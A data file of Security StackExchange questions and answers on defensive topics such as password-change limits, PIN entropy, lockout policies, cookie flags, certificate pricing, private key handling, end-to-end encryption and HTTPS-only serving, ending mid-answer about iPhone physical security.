155,558 | So I managed to change my password on a service to the "wrong" password, for simplicity let's just say I changed it to an insecure password. Now, I wanted to change it to a more secure password but instead I got a nice error message: The password you entered doesn't meet the minimum security requirements. Which was interesting, considering this new password was using more letters, more numbers and more special characters than the last password. I did some research and found out that the service I am using has a security rule where you have to wait 24 hours before changing the password again. I asked my provider if they could do the change in the accepted answer of that link, but they said they couldn't do it and that the 24 hour wait was "for security reasons". Which leads to my question. How can waiting 24 hours to change the password again be secure? What are the pros/cons of making a user wait before they can change their password again? | By itself, the rule of only allowing one password change per day adds no security. But it often comes in addition to another rule that says that the new password must be different from the n (generally 2 or 3) previous ones. The one change per day rule is an attempt to avoid this trivial perversion: a user has to change his password because it has reached its time limit he changes it to a new password he repeats the change immediately the number of saved passwords minus one he changes it immediately back to the original one => hurrah, still same password which is clearly what the first rule was trying to prevent... Ok, the rule could be the changing the password many times in one single day does not roll the last passwords list. But unfortunately the former is builtin in many systems while the latter is not... Said differently, it is just one attempt to force non cooperative users to change their password on a timely manner. Just a trivial probabilistic analysis after comments saying that allowing users to never change their password is not a security problem. Say you have a rather serious user and that the risk for his password to be compromised in one day is 1%. Assuming about 20 work days a month, the risk of being compromised in a quarter is of about 50% (1-(1- 1/100)^60)). And after one year (200 work days) we reach 87%! Ok, 1% may be high, and just start at 0.1% per day, only one on 1000, pretty negligible isn't it? But after 1 year (200 work days) the risk of begin compromised is almost 20% (18% to be honest). If it is the password for holidays photos I would not care, but for something more important it does matter. It means that what is essential is to educate users and have them accept the rules because we all know that rules can easily be by-passed, and that if a user does not agree with them it will not be cooperative. But asking users to regularly change their password is a basic security rule, because passwords can be compromised without the user noticing that, and the only mitigation way is to change the (likely compromised) password. | {
"source": [
"https://security.stackexchange.com/questions/155558",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109012/"
]
} |
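The probability figures in the answer above are easy to reproduce. The per-day compromise probabilities are the same illustrative guesses used there, not measured values, and independence between days is assumed.

def cumulative_risk(p_per_day: float, work_days: int) -> float:
    # Chance of at least one compromise over the period.
    return 1 - (1 - p_per_day) ** work_days

for p in (0.01, 0.001):
    print(f"p = {p}: quarter (60 days) = {cumulative_risk(p, 60):.0%}, "
          f"year (200 days) = {cumulative_risk(p, 200):.0%}")
# p = 0.01:  quarter ~ 45%, year ~ 87%
# p = 0.001: quarter ~ 6%,  year ~ 18%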
155,572 | I'm learning about buffer overflows, and I get the idea of fat pointers, but what I don't quite get is how they are a good protection. If you were able to modify the pointer so it points to another address, wouldn't you be able to modify the obj base and obj end sections of the fat pointer so that the pointer still seems valid? | Buffer overflows aren't about setting the pointer to point to another arbitrary address. A buffer overflow happens when an input causes your program to perform a seemingly-correct operation (e.g. "increment(): move the pointer forward 256 bytes") too many times, so that the pointer moves out of the intended data structure / array and into another object. A "fat pointer" contains information about the data structure / array size.
This means increment() can have safety checks in its code, to make sure the pointer is within the appropriate bounds. You still need safety checks somewhere in your code, but this lets you centralise it. | {
"source": [
"https://security.stackexchange.com/questions/155572",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/140429/"
]
} |
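To make the bounds-checking idea above concrete, here is a small Python model of a fat pointer. Real fat pointers are a compiler/runtime feature of low-level languages, so this is only an analogy showing where the increment() check sits and why an overflowing sequence of otherwise-legitimate increments gets stopped.

class FatPointer:
    # Toy fat pointer: carries base and end alongside the current position.
    def __init__(self, buffer: bytearray):
        self.buffer = buffer
        self.base = 0
        self.end = len(buffer)        # one past the last valid byte
        self.pos = 0

    def increment(self, n: int) -> None:
        # The centralised safety check: refuse to move outside [base, end).
        if not (self.base <= self.pos + n < self.end):
            raise IndexError("pointer would leave its object")
        self.pos += n

    def read(self) -> int:
        return self.buffer[self.pos]

p = FatPointer(bytearray(16))
p.increment(8)                         # fine
try:
    p.increment(256)                   # would overflow into another object
except IndexError as e:
    print("blocked:", e)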
155,606 | Imagine a typical 4-digit PIN scheme containing the digits [0-9]. If I choose my PIN at random, I will get one out of 10 * 10 * 10 * 10 = 10,000 codes. Based on my own experience, more than half of the time a random sequence of four digits will contain some property or pattern that significantly lowers its entropy: single digit used in more than one position, ascending/descending pattern, etc. (Yes, yes, a 4-digit PIN only has something like 13 bits of entropy max to begin with, but some random codes are even more awful.) If I were to abide by a rule where I only use a PIN that has a unique digit in each position, I believe the number of codes available to me becomes 10 * 9 * 8 * 7 = 5,040 (somebody please correct me if I got that wrong). I have almost halved my key space, but I have also eliminated many of the lower-entropy codes from consideration. At the end of the day, did I help or hurt myself by doing that? EDIT: Wow, lots of great responses in here. As a point of clarification, I was originally thinking less in terms of an ATM/bank PIN (which likely has an aggressive lockout policy after a number of incorrect guesses) and more in terms of other "unsupervised" PIN-coded devices: programmable door locks, alarm system panels, garage door keypads, etc. | The thing is, with a 4-digit PIN, entropy isn't really important. What's important is the lockout and the psychology of the attacker. The keyspace is so small that any automated attack (without lockout) would exhaust it almost instantly. What you're worried about is an attacker guessing the PIN before the account locks. So assuming a sane lockout (say 3-5 incorrect attempts), you want your PIN to be outside the 3-5 most likely to be chosen PINs. Personally I'd avoid any 4-digit repeating sequence and anything starting 19XX which would be a year of birth. Now smart alecs will say "ahh but if you do that the attackers will know not to try those", but that only applies if a) the majority of the user population follow that advice (hint, they probably won't) and b) the attackers know that the user population has followed that advice. Some great analysis of this (link courtesy of @codesincahaos) Edit 2 - For a far more mathematical take on this I'd recommend reading @diagprov's answer (see also the quick keyspace calculation after this entry) | {
"source": [
"https://security.stackexchange.com/questions/155606",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36812/"
]
} |
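A quick enumeration backs up the arithmetic in the question above and shows how little keyspace the unique-digit rule actually gives up:

import math
from itertools import product

all_pins = [''.join(d) for d in product("0123456789", repeat=4)]
unique_digit_pins = [p for p in all_pins if len(set(p)) == 4]

print(len(all_pins), round(math.log2(len(all_pins)), 1))                    # 10000, ~13.3 bits
print(len(unique_digit_pins), round(math.log2(len(unique_digit_pins)), 1))  # 5040, ~12.3 bits

So the restriction costs about one bit of entropy, which matters far less than the lockout policy and guess ordering discussed in the answer.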
155,754 | Some websites lock out a user after a series of incorrect password attempts for example for 15 minutes. If a malicious actor knows this, can they deliberately try logging in with incorrect passwords every 15 minutes to prevent the real person from logging in? Is this a real threat and if so how can websites protect against it? | Login brute-force protection can be enforced in three ways: Temporary Lockout Permanent Lockout CAPTCHA In my perspective, CAPTCHA is the most reasonable solution to avoid the risk of bruteforce as well as denial of service due to account lockout. You might have seen a CAPTCHA appearing on the login pages of Facebook and Gmail in case you enter wrong password more than three or four times. That's a decent way of restricting bots from bruteforcing and at the same time avoiding locking users out. Permanent lockout is not a novel solution, and it adds a lot of operational overhead to customer support team if they have to manually unlock the account for the user. Temporary lockout on the other hand deter bruteforcing, but like the scenario you mentioned, it can lock out a genuine user. | {
"source": [
"https://security.stackexchange.com/questions/155754",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/142970/"
]
} |
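One way to combine the options above without turning the lockout into a denial-of-service lever is to escalate to a CAPTCHA after a few recent failures instead of locking the account. The thresholds, window and in-memory storage below are arbitrary examples for illustration; a real deployment would also track per-IP state and persist the counters.

import time
from collections import defaultdict

FAILURE_WINDOW = 15 * 60      # seconds, arbitrary example
CAPTCHA_THRESHOLD = 3

failures = defaultdict(list)  # username -> timestamps of recent failed logins

def record_failure(username: str) -> None:
    failures[username].append(time.time())

def requires_captcha(username: str) -> bool:
    cutoff = time.time() - FAILURE_WINDOW
    failures[username] = [t for t in failures[username] if t > cutoff]
    # Demand a CAPTCHA rather than locking the account, so an attacker
    # cannot lock the real user out by guessing wrong on purpose.
    return len(failures[username]) >= CAPTCHA_THRESHOLD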
155,925 | We have an intranet system we use to book, track and process invoices for our core business. My boss would like to move this system to the Internet to make it "accessible everywhere". However, I feel this is not wise. Are there some reasons that connecting internal systems directly to the Internet is a bad thing? The system does have its own user and authentication system and was developed in-house by some gifted coders. It has also been penetration tested, but this was all done on the basis that the system was only accessible from the internal domain. | First, it might be best to fully understand the client (your boss's) needs. It's possible he or she only needs access to one small subset of the data on this server from anywhere and not necessarily all of it. Where possible, instead of saying no in this situation come back with a few options. VPN so people travelling, can access the data wherever they are at. If possible add additional security controls like internal firewalls and Data Loss Prevention (DLP) if needed. Harden and add additional security controls here as necessary. Strong authentication and encryption to a separate server which contains a small subset of the data but possibly not all of the sensitive data. Harden and add additional controls here as necessary. Only allowing the server with the sensitive data to push data to the one that can be accessed publically and blocking all packets from the publically accessible server going back to the one containing the sensitive data can be a helpful trick (one-way firewall rule). Create a secure front-end server which can be accessed from anywhere and has controlled access to the backend server. Harden and add additional controls here as necessary. Harden the server itself and if applicable deploy a WAF, or other controls, in front of it. Think of other creative solutions depending on your boss's actual needs (your question isn't specific about the actual needs). No matter which option is chosen make sure you log and monitor access to the system. It would be wise to follow up with your boss after the system starts getting connections from other countries (or at least IP's that are obviously not from people who work with you) and show him or her the global connections to the system. Sometimes this real-world feedback is required for people to understand that the risk. Use this as a chance to educate your boss but do so in a very humble manner sticking strictly to real data, he may have had too many people selling security to him with Fear, Uncertainty, and Doubt (FUD) and may simply not listen to anything that sounds similar regardless of how legitimate this information is. Beware of FUD fatigue. If he or she has reached their limit anything you say in this respect will have the opposite effect you want. When this occurs your best solution is delivering factual data and allowing him or her to come to their own conclusions. Be a problem solver here, provide your boss with solutions, rather than simply with reasons to say no. Don't be afraid to propose expensive solutions that you think are too expensive for the company, your boss may be ok if it moves functionality forward quickly for him or her. That said when possible, always keep security as inexpensive as possible long-term (avoid recurring costs that may get cut during an economic hardship). View this as an opportunity for you to get more security in place by enabling the business rather than fighting it. 
If you show that you can empower the business and frame needs in terms of what moves the business forward or how things could affect the business you'll get much better response from people like your CEO. Understanding when the business is in a rush is important too, it's not uncommon for a company to pay more money for a solution or approve things which they might not otherwise approve if it can add value and be deployed quickly. To this end, knowing when to time requests and understanding the urgency of the projects in flight will also help you. Think of this part of business as a martial art, you want to leverage your opponents energy and redirect it to a place you want them to go while minimising your own energy expenditure. If you can quickly grab his or her desire to have this accessible, now might be a great time to get a lot more security in place. Speed is important here and you need to get buy-in while it's hot so to speak. Finally, recognize that you will be much better off addressing this as a business problem that you can help with, rather than just a technical security problem. Likewise, start looking for and anticipating additional security needs going forward and bring them to your boss early on so you look like someone helping the company rather than as a roadblock to progress. This bit of framing accomplishes the same objective but gets security in faster and with less conflict. Addition after original post: One thing that may also be helpful for you is to create a long-term security roadmap and share that with your organization. What this entails will be different for every organization but it's very important to show the work you are not currently doing and also work that may be things your organization will never do internally (small start-ups are less likely to have forensic teams in-house). The reason for this is to help educate and also to help set expectations with your leadership team. This is something many security teams have in their head but formalizing a plan and showing a path forward can help you get more buy-in for your security program. A large part of this is about communication and having a shared vision business-wise but another part of this is about educating senior management about where they are risk-wise. I find that visualizing your organizations security-debt helps people automatically make more thoughtful decisions. | {
"source": [
"https://security.stackexchange.com/questions/155925",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/144215/"
]
} |
157,133 | I understand that cookies with the secure flag should only be transmitted over an HTTPS connection. It also means that these cookies should be protected from adversaries (private cookies). Thus, it is important to set the HttpOnly flag on this kind of private cookie to limit the impact of XSS. Is a private cookie with the secure flag but no HttpOnly flag a problem? Essentially, I think the HttpOnly flag should be added to a cookie with the secure flag. | The secure flag ensures that the setting and transmitting of a cookie is only done in a secure manner (i.e. HTTPS). If there is an option for HTTP, the secure flag should prevent transmission of that cookie. Therefore, a missing secure flag becomes an issue if there is an option to use or fall back to HTTP. HttpOnly ensures that scripting languages (i.e. JavaScript) won't be able to read the cookie value (such as through document.cookie); the only way to get it is through HTTP request and response headers. Therefore, a missing HttpOnly flag coupled with an XSS vulnerability is a recipe for a stolen session token. It's best to set both the HttpOnly and secure flags on your session token (see the sketch after this entry). For other cookies, it depends on how sensitive they are and what they are used for. | {
"source": [
"https://security.stackexchange.com/questions/157133",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/123434/"
]
} |
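For reference, both flags discussed above are set when the cookie is issued. Here is a minimal Flask-flavoured sketch; the framework, route and cookie name are just illustrative choices, and the raw header it produces is equivalent to Set-Cookie: session=...; Secure; HttpOnly; SameSite=Lax.

from flask import Flask, make_response

app = Flask(__name__)

@app.route("/login", methods=["POST"])
def login():
    resp = make_response("logged in")
    # secure=True: only ever sent over HTTPS; httponly=True: invisible to document.cookie
    resp.set_cookie("session", "opaque-random-token", secure=True,
                    httponly=True, samesite="Lax")
    return resp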
157,175 | I understand SSL certificates cost money because of reputation: most/all web browsers have a limited list of companies that demonstrated they are trusted sources of SSL certificates and therefore don't present users with a Back To Safety! screen for those companies' products. My question is why is this not a one-time expense? I am considering moving from a self-signed cert, but my web host just told me it would be starting at $35 per year , and they can easily go up to hundreds per year. Why isn't this a one-time fee? | Let's start with the cynical view: Certificate Authorities are for-profit companies, so they will charge as much as they are able to get away with! More seriously, running a certificate authority is an expensive, low profit margin business, but the answer really comes down to the type of certificate you want. Domain-Validated (DV) Certificates For a basic DV cert which, makes your browser address bar look like this: the costs are very low - basically the CA just needs to confirm that the person requesting the cert had control of the server at the time of request. This can be fully automated. As @SteffenUllrich points out, in 2014 the Electronic Frontier Foundation, Mozilla, and the University of Michigan teamed up to set up a 100% free CA Let's Encrypt for issueing DV certs. Based on the use-case you described in the question, it sounds like that would suit your needs. Extended Validation (EV) Certificates If you want the high-end certs that include your verified company name and country in which it is registered to appear in the browser like this: then there is significantly more cost to the CA. Before issuing an EV cert, the CA is required to have a human verify a whole pile of things about the legal status of your company. Things like: is your company legally registered under the name listed in the cert request? Is the person requesting the cert listed as a legal officer of the company in the company's registration documents? Is the DNS record for the requested website registered to the same company? etc. Why a recurring fee? The reason that CAs charge a recurring fee is the same reason that you can't get a 10 year SSL cert: the CA/Browser forum requires certs to expire and be completely re-validated every year or two. The security reasons for this are to force key rollover, to prevent the company from going bankrupt or changing name and a rogue sysadmin from continuing to use the cert nefariously, etc. The CA is required to do all this background checking not only on first time issuance, but also every time the cert is renewed. The added value for you is that your customers get a higher level of assurance in the trust-worthiness of your website (sure, 99% of consumers won't notice, but auditors and hackers certainly will!), and also, Google is moving towards giving higher search preference to sites with higher quality certs. This is why certs can cost hundreds of dollars per year; you are not just paying for a couple bits of data, you are paying for the time of the human who has to do the verification. OCSP servers There are also server costs for maintaining a cert, mainly the costs of OCSP , which requires the CA to maintain high-bandwidth, low-latency, zero-downtime servers for responding to revocation checks on each cert they issued. While this might not sound expensive, every web browser must ping a CA's OCSP server during every HTTPS page load. Every extra millisecond that the CA takes to respond adds to the page load time of every page on the internet . 
Running a low-latency server at this level of traffic is a tricky network engineering problem. [disclosure: I work for a CA] | {
"source": [
"https://security.stackexchange.com/questions/157175",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/90486/"
]
} |
157,243 | I just requested a CSR from my shared web hosting provider, to generate a certificate which I will send back to them to install. (The certificate itself is to be generated properly by an organisation I work for who can provide certificates for our official use.) The hosting company promptly sent me the CSR but also the private key! They even CC'd someone else, and it's in Gmail so Google has presumably already ingested it for advertising purposes. In my humble opinion this seems like a terrible thing to do. I am about to write back to them rejecting this one, and asking to renew the CSR and this time keep the private key - private. Before I make a fool of myself, I'd like to confirm that the private key for an "SSL" (TLS) certificate should never leave the server? I've been working in security-related industries for many years, and used to be a crypto programmer, so I feel I know the topic a little - but I know things change over time. I have read this related question: What issues arise from sharing a SSL certificate's private key? Meta Update: I've realised I've written a poor-quality question format for Stack Exchange - as it's now difficult to accept a specific answer. Apologies for that - all answers covered different and equally interesting aspects. I did initially wonder how to word it for that purpose but drew a blank. Update: I have followed this though with the host and they did "apologise for any inconvenience", promised to keep future private keys "safe" and issued me a new, different CSR. Whether it's generated from the same exposed private key I am currently unsure of. I now also wonder, as it's a shared host, if they've sent me the key for the entire server or if each customer/domain/virtual host gets a key pair. It's an interesting lesson how all the crypto strength in the world can be rendered null and void by a simple human error. Kevin Mitnik would be nodding. Update 2:
In response to an answer from user @Beau, I have used the following commands to verify the second CSR was generated from a different secret private key. openssl rsa -noout -modulus -in pk1.txt | openssl md5
openssl req -noout -modulus -in csr1.txt | openssl md5
openssl req -noout -modulus -in csr2.txt | openssl md5 The first two hashes are identical, the third is different. So that's good news. | If I were in your place I would refuse to accept this SSL certificate.
The reason for that is that if someone broke into either of the mailboxes that received the private key, they would be able to download it and then impersonate the server in attacks against clients, such as man-in-the-middle attacks.
Also, if one of the receiving email addresses was written incorrectly, someone may already have the private key, and there are probably many more scenarios in which this private key could be downloaded and used by an attacker. It is also important to tell the company not to share the private key, to make sure that they won't send it anywhere else - the private key was sent to you and some other CCs on this email, but you cannot know whether the company also sent a separate email with the private key somewhere else. There is a reason why the private key is called a private key. Please note that this is mostly my personal opinion, and that I am not an expert with SSL. | {
"source": [
"https://security.stackexchange.com/questions/157243",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/121341/"
]
} |
157,292 | I've been told that WhatsApp implemented "end-to-end" encryption. In the grand scheme of things, what does this actually mean versus, say, another service which does use HTTPS, such as this website (StackExchange) or some other non-end-to-end encrypted site? Is there some point where even HTTPS/TLS will expose data that doesn't occur in an end-to-end encrypted app like WhatsApp? | End-to-end is where the message is encrypted by the sender and decrypted by the receiver. Nobody in the middle, not the chat provider nor other entities have the ability to decrypt it. Compare this to a simple chat over HTTPS. Each message is encrypted in transit, just based on the fact that TLS is used. Now, while the intended recipient is another user, the TLS connection is initiated with a server (think Facebook). TLS terminates at the server, and whoever controls the server has the ability to view the messages since they are not encrypted end-to-end. Then, the message may be passed on encrypted over TLS again to the recipient. The key difference is that the provider is able to view the messages in this case. | {
"source": [
"https://security.stackexchange.com/questions/157292",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/136795/"
]
} |
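A stripped-down way to see the difference described above: with end-to-end encryption the ciphertext is produced with keys that only the two users hold, so the relaying server can store and forward it but never read it. The sketch below uses PyNaCl purely as an illustration; real messengers add key verification, ratcheting and multi-device handling on top.

from nacl.public import PrivateKey, Box

alice_sk, bob_sk = PrivateKey.generate(), PrivateKey.generate()

# Alice encrypts directly to Bob's public key.
ciphertext = Box(alice_sk, bob_sk.public_key).encrypt(b"meet at 6")

# The chat server only ever sees and forwards `ciphertext`.
# Bob, and only Bob, can open it with his private key:
plaintext = Box(bob_sk, alice_sk.public_key).decrypt(ciphertext)
assert plaintext == b"meet at 6"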
157,294 | I'm an absolute security nubile who wants to access his Windows desktop PC from his Mac laptop. I'd like to do this so I have all of my stuff in one place, and I also have some work documents stored on my personal PC that I'd like to access from the road. I discovered Microsoft RDP and thought it might fit the task, but I'm concerned about security implications, and some of my work documents being exposed to malicious do-no-gooders. I've made some changes to my RDP setup after a bit of searching, such as changing the RDP port to a random number, requiring authentication using NLA, and requiring SSL for incoming connections. I've also set up Duo TFA to be required on all RDP connections. My question is, if i set up port forwarding and expose myself to the internet, is this still a really bad idea? What other alternatives do I have? I did a bit of research on VPNs, but I couldn't really make sense of it all. I'd really appreciate your advise. | End-to-end is where the message is encrypted by the sender and decrypted by the receiver. Nobody in the middle, not the chat provider nor other entities have the ability to decrypt it. Compare this to a simple chat over HTTPS. Each message is encrypted in transit, just based on the fact that TLS is used. Now, while the intended recipient is another user, the TLS connection is initiated with a server (think Facebook). TLS terminates at the server, and whoever controls the server has the ability to view the messages since they are not encrypted end-to-end. Then, the message may be passed on encrypted over TLS again to the recipient. The key difference is that the provider is able to view the messages in this case. | {
"source": [
"https://security.stackexchange.com/questions/157294",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/145653/"
]
} |
157,422 | I have a web application that has the following use case: User creates account with username and password -- hashed password is stored in database. User logs in (persists across sessions) -- login token is stored in cookie. User inputs and submits text data -- data is stored in database, but is sensitive and shouldn't be exposed even if database is compromised. Only the (logged in) user, and no one else, can read the submitted data. For convenience, user should not need to enter any passphrase to encrypt/decrypt the data. Is this feasible? How should the data be encrypted? | You can use a key derivation function to convert the user's password into an encryption key. Then you would use a cryptographically secure pseudorandom number generator to generate a separate key that would encrypt the user's data. You would then use the derived key to encrypt the generated key. The resulting ciphertext of the data encryption key could then be stored safely in the user table of your database (call the field "encryptedkey" if you like). In this way, the user's password will become the means to decrypt the user's encrypted key. The key that actually encrypts the data is only decrypted long enough to decrypt the data that it encrypted. You'll need to store that key in the session in order to avoid the need to ask the user for his password on each decryption occurance. Alternatively, you can store the key encryption key on a Key Management Service such as that offered by Amazon AWS. This way you would retrieve the key from Amazon over TLS using only a reference to the key. Of course in this case you will still need to store the authentication credentials for the KMS somewhere in your architecture, possibly in a remotely retrieved highly secured config file. Random Number Generator ⟶ Helps create Key #1. This key encrypts your data. It stays constant over time. You must generate this key when the user first registers. Use a CSPRNG (cryptographically secure pseudo-random number generator) to ensure sufficient randomness and unpredictability. Password ⟶ Converted into Key #2 with PBKDF2. This key, Key #2, is used to encrypt Key #1. You'll want to persist Key #2 in the user's session. Store the encrypted form of Key #1 in the user table, in a field called (perhaps) "encryptedkey". Changing passwords Whenever the user changes their password, you only have to execute step #2 again, rather than encrypting all of your data, all over again. Just convert the new password into a key (Key #2), re-encrypt Key #1, and overwrite the old value for the encrypted form of Key #1. Encrypting/decrypting data When the user has logged in, execute step #2. Once you have the password converted into a key, just decrypt Key #1. Now that you have Key #1 decrypted, you can use Key #1 to encrypt and decrypt your data. | {
"source": [
"https://security.stackexchange.com/questions/157422",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/145806/"
]
} |
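Following the scheme in the answer above (Key #1 encrypts the data, Key #2 is derived from the password and only wraps Key #1), here is a hedged Python sketch using the cryptography package. The iteration count, key sizes and the literal password are placeholders, and storage, sessions and error handling are left out.

import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

def derive_kek(password: bytes, salt: bytes) -> bytes:
    # Key #2: derived from the user's password, never stored anywhere.
    return PBKDF2HMAC(algorithm=hashes.SHA256(), length=32,
                      salt=salt, iterations=600_000).derive(password)

# Registration: create Key #1 with a CSPRNG and wrap it with Key #2.
salt = os.urandom(16)
data_key = AESGCM.generate_key(bit_length=256)                   # Key #1
kek = derive_kek(b"users-main-password", salt)                   # placeholder password
wrap_nonce = os.urandom(12)
encrypted_key = AESGCM(kek).encrypt(wrap_nonce, data_key, None)  # store salt, wrap_nonce, encrypted_key

# Login: unwrap Key #1 from the stored blob, then encrypt/decrypt user data with it.
data_key = AESGCM(derive_kek(b"users-main-password", salt)).decrypt(wrap_nonce, encrypted_key, None)
nonce = os.urandom(12)
ciphertext = AESGCM(data_key).encrypt(nonce, b"sensitive user text", None)

Changing the password then only requires re-wrapping data_key with a newly derived Key #2, exactly as the answer describes.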
157,520 | If a hash algorithm has an option for selecting the output-hash-length (e.g., 128 vs. 512 bits), and all other aspects of the hash function are the same, which hash-length is probably more secure/useful, and why? | How Hashes work The concept behind hashes is very simple: take a message of arbitrary size, and deterministically produce a random-looking output of a given size. For a well-built cryptographic hash function, the only way to break it is to try random inputs until you get the hash value you want (collision or pre-image, etc). Which is more secure? All other thing being equal (ie it's the same algorithm, just with a different output size, ex.: SHA2-224 vs SHA2-512), then the larger the output of the hash, the more secure it is. Reason: if you have a 224-bit hash, then you expect an attacker to have to make 2 223 guesses (on average) to break it, whereas a 512-bit has requires the attacker to make 2 511 guesses (on average). Which is more useful? This one I can't answer for you, it depends on a lot of factors about the application that's using it. For example, whether you have memory, bandwidth, or processing constraints, whether you are able to easily upgrade your infrastructure if the 128-bit hash gets deprecated or if the solution you're setting up needs to be future-proof for 10 years, etc. With only the information you've given, I can't answer this for you. | {
"source": [
"https://security.stackexchange.com/questions/157520",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138656/"
]
} |
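A concrete version of the "same algorithm, different output size" comparison above, using BLAKE2b's selectable digest size in Python's hashlib. The work factors in the comments are the generic brute-force bounds, not claims about any particular attack.

import hashlib

msg = b"the same message"

short = hashlib.blake2b(msg, digest_size=16)   # 128-bit output
long_ = hashlib.blake2b(msg, digest_size=64)   # 512-bit output

print(short.hexdigest())   # preimage ~2**128 guesses, collision ~2**64 (birthday bound)
print(long_.hexdigest())   # preimage ~2**512 guesses, collision ~2**256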
157,572 | I am setting up a new webserver. In addition to TLS/HTTPS, I'm considering implementing Strict-Transport-Security and other HTTPS-enforcement mechanisms. These all seem to be based on the assumption that I am serving http://www.example.com in addition to https://www.example.com . Why don't I just serve HTTPS only? That is, is there a security-based reason to serve HTTP -- for example, could someone spoof http://www.example.com if I don't set up HSTS? | Why don't I just serve https only? The main reasons are the default behavior of browsers and backward compatibility . Default behavior When an end-user (i.e, without knowledge in protocols or security) types the website address in its browser, the browser uses by default HTTP. See this question for more information about why browsers are choosing this behavior. Thus, it is likely that users will not be able to access your website. Backward compatibility It is possible that some users with old systems and old browsers do not support HTTPS or more likely, do not have an up-to-date database of root certificates , or do not support some protocols. In that case, they either will not be able to access the website or will have a security warning. You need to define whether the security of your end-users is important enough to force HTTPS. Many websites still listen to HTTP but automatically redirects to HTTPS and ignore users with really old browsers. could someone spoof http://www.example.com if I don't set up HSTS? If an attacker wants to spoof http://www.example.com , it needs to take control of the domain or take control of the IP address in some way. I assume you meant: could an attacker perform a man-in-the-middle attack? In that case yes, but even with or without HSTS: Without HSTS : An attacker can easily be in the middle of your server and the user, and be active (i.e, modify the content) or passive (i.e., eavesdrop) With HSTS : The first time a user try to visit the site using HTTP, an attacker could force the user to use HTTP. However, the attacker has a limited time window of when it can perform its attack. What you should do? Like many websites, you should allow HTTP connections and make you server redirects the user to the HTTPS version. This way you override the default behavior of browsers and ensure your users use the HTTPS version. Old systems without the proper protocols or root certificates will not be able to access the site (or at least will have a warning), but depending on your user base this should not be an issue. Conclusion It will do more harm than good to disable HTTP. It does not really provide more security. Any security added to protect a resource is useless if it prevents most of its users from accessing it. If your end-users cannot access your website because their browser default to HTTP and you do not listen for HTTP connections, what is the benefit? Just perform the HTTP 301 redirection to the HTTPS version. Related questions Why do browsers default to http: and not https: for typed in URLs? Why is HTTPS not the default protocol? Why should one not use SSL? Why do some websites enforce lack of SSL? | {
"source": [
"https://security.stackexchange.com/questions/157572",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7062/"
]
} |
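The "listen on HTTP but redirect" recommendation above fits in a few lines. This Flask-style sketch is only one of many ways to do it (a web server or load balancer rule is more common in practice), and the HSTS lifetime is an arbitrary example value.

from flask import Flask, redirect, request

app = Flask(__name__)

@app.before_request
def force_https():
    if not request.is_secure:
        # Permanent redirect from http://... to https://...
        return redirect(request.url.replace("http://", "https://", 1), code=301)

@app.after_request
def add_hsts(resp):
    # Ask returning browsers to skip HTTP entirely next time.
    resp.headers["Strict-Transport-Security"] = "max-age=31536000"
    return resp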
157,579 | I am asked to integrate the code audit tool HP Fortify in our development process, but the main constraint about it is that the whole code should not be scanned every time: only the classes impacted by the last backlog item should be analyzed. We are using Jenkins and SonarQube, so I gave a look at the plugins available but couldn't find anything matching the requirements: do not scan the whole code everytime. Would you know any tool or HP Fortify configuration that could suit what I need? | Why don't I just serve https only? The main reasons are the default behavior of browsers and backward compatibility . Default behavior When an end-user (i.e, without knowledge in protocols or security) types the website address in its browser, the browser uses by default HTTP. See this question for more information about why browsers are choosing this behavior. Thus, it is likely that users will not be able to access your website. Backward compatibility It is possible that some users with old systems and old browsers do not support HTTPS or more likely, do not have an up-to-date database of root certificates , or do not support some protocols. In that case, they either will not be able to access the website or will have a security warning. You need to define whether the security of your end-users is important enough to force HTTPS. Many websites still listen to HTTP but automatically redirects to HTTPS and ignore users with really old browsers. could someone spoof http://www.example.com if I don't set up HSTS? If an attacker wants to spoof http://www.example.com , it needs to take control of the domain or take control of the IP address in some way. I assume you meant: could an attacker perform a man-in-the-middle attack? In that case yes, but even with or without HSTS: Without HSTS : An attacker can easily be in the middle of your server and the user, and be active (i.e, modify the content) or passive (i.e., eavesdrop) With HSTS : The first time a user try to visit the site using HTTP, an attacker could force the user to use HTTP. However, the attacker has a limited time window of when it can perform its attack. What you should do? Like many websites, you should allow HTTP connections and make you server redirects the user to the HTTPS version. This way you override the default behavior of browsers and ensure your users use the HTTPS version. Old systems without the proper protocols or root certificates will not be able to access the site (or at least will have a warning), but depending on your user base this should not be an issue. Conclusion It will do more harm than good to disable HTTP. It does not really provide more security. Any security added to protect a resource is useless if it prevents most of its users from accessing it. If your end-users cannot access your website because their browser default to HTTP and you do not listen for HTTP connections, what is the benefit? Just perform the HTTP 301 redirection to the HTTPS version. Related questions Why do browsers default to http: and not https: for typed in URLs? Why is HTTPS not the default protocol? Why should one not use SSL? Why do some websites enforce lack of SSL? | {
"source": [
"https://security.stackexchange.com/questions/157579",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/111988/"
]
} |
157,627 | I’ve heard about a rule in Information Security, that once a hacker has access to your physical machine, then it’s all over. However, there seems to be a big exception to this rule: iPhones. It was all over the news a while back that the CIA (or the FBI or something) could not access information from a terrorist’s phone for their counter-terrorism ops. They had to ask Apple to create them an unlocking program that could unlock the phone for them. My question is, why are iPhones so hard to hack? | I don't think you are interpreting the rule you've heard in the right way. If an attacker has physical access to an encrypted but switched-off device, he cannot simply break the encryption, provided that the encryption was done properly. This is true for an iPhone as much as it is for a fully encrypted notebook or an encrypted Android phone. The situation is different if the device is not switched off, i.e. the system is on and the operating system has access to the encrypted data because the encryption key was entered at startup. In this case the attacker might try to use an exploit to let the system provide him with the decrypted data. Such exploits are actually more common on Android, mainly because you have many vendors and a broad range of cheap and expensive devices on this system vs. only a few models and a tightly controlled environment with iPhones. But such exploits exist for the iPhone too. With physical access it would also be possible to manipulate the device in a stealthy way in the hope that the owner does not realize that the device was manipulated and enters the passphrase which protects the device. Such manipulations might be software- or hardware-based keyloggers or maybe some transparent overlay over the 